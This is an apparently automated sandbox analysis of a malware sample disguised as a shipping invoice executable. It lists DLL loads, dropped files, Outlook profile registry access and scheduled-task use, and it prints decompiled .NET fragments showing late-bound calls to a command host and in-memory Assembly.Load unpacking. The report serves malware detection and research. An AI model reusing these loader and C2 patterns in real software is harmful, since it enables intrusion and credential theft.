Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: SCS AWB and Commercial Invoice.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SCS AWB and Commercial Invoice.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: SCS AWB and Commercial Invoice.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ALQQ.pdb source: bxhciy.exe, 0000000F.00000000.2162072549.0000000000B32000.00000002.00000001.01000000.0000000D.sdmp, ungagCKiEnZdl.exe.15.dr, bxhciy.exe.9.dr
Source:	Binary string: ALQQ.pdbSHA256 source: bxhciy.exe, 0000000F.00000000.2162072549.0000000000B32000.00000002.00000001.01000000.0000000D.sdmp, ungagCKiEnZdl.exe.15.dr, bxhciy.exe.9.dr
Source:	Binary string: mQns.pdb source: SCS AWB and Commercial Invoice.exe, HOYVjVj.exe.0.dr
Source:	Binary string: mQns.pdbSHA256 source: SCS AWB and Commercial Invoice.exe, HOYVjVj.exe.0.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, iG6Ol3nKUDlcTUrOfA.cs	.Net Code: ICd629427f System.Reflection.Assembly.Load(byte[])
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack, Messages.cs	.Net Code: Memory
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack, Messages.cs	.Net Code: Memory
Source: 0.2.SCS AWB and Commercial Invoice.exe.2b40000.0.raw.unpack, iG6Ol3nKUDlcTUrOfA.cs	.Net Code: ICd629427f System.Reflection.Assembly.Load(byte[])
Source: 0.2.SCS AWB and Commercial Invoice.exe.3e899c8.4.raw.unpack, MainForm.cs	.Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.SCS AWB and Commercial Invoice.exe.47e2188.3.raw.unpack, iG6Ol3nKUDlcTUrOfA.cs	.Net Code: ICd629427f System.Reflection.Assembly.Load(byte[])

Source: SCS AWB and Commercial Invoice.exe

Static PE information: 0xA78B6D53 [Mon Jan 27 22:36:03 2059 UTC]

Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_0110D6B8 pushfd ; ret	0_2_0110D6B9
Source: C:\Users\user\Desktop\SCS AWB and Commercial Invoice.exe	Code function: 0_2_070880F0 push cs; ret	0_2_070880F1
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_018DD6B8 pushfd ; ret	10_2_018DD6B9
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F780F0 push cs; ret	10_2_08F780F1
Source: C:\Users\user\AppData\Roaming\HOYVjVj.exe	Code function: 10_2_08F7A2E2 pushad ; ret	10_2_08F7A2E9
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Code function: 15_2_00007FF84887486D push eax; retf	15_2_00007FF8488748A6
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Code function: 16_2_00007FF84885814B push ebx; ret	16_2_00007FF84885816A
Source: C:\Users\user\AppData\Local\Temp\bdeukn.exe	Code function: 16_2_00007FF84885809E push ebx; ret	16_2_00007FF84885816A
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Code function: 23_2_00007FF84884814B push ebx; ret	23_2_00007FF84884816A
Source: C:\Users\user\AppData\Local\Temp\bxhciy.exe	Code function: 23_2_00007FF84884809E push ebx; ret	23_2_00007FF84884816A
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Code function: 28_2_00007FF84886814B push ebx; ret	28_2_00007FF84886816A
Source: C:\Users\user\AppData\Roaming\ungagCKiEnZdl.exe	Code function: 28_2_00007FF84886809E push ebx; ret	28_2_00007FF84886816A

Source: SCS AWB and Commercial Invoice.exe	Static PE information: section name: .text entropy: 7.421733298675831
Source: HOYVjVj.exe.0.dr	Static PE information: section name: .text entropy: 7.421733298675831
Source: bxhciy.exe.9.dr	Static PE information: section name: .text entropy: 7.523361156504941

Source: 0.2.SCS AWB and Commercial Invoice.exe.482eba8.5.raw.unpack, R9uGs2uCgmAZ9Ivbgm.cs	High entropy of concatenated method names: 'cIKdRfWFHs', 'CsTd8q2mCc', 'JSodmiT6qt', 'fTHdTbCuCS', 'sukdN6mt38', 'UPZdf2UaOT', 'Wlmd7cWZIL', 'mpPdaeOROm', 'lqQdciqLBN', 'DCddMA8M92'
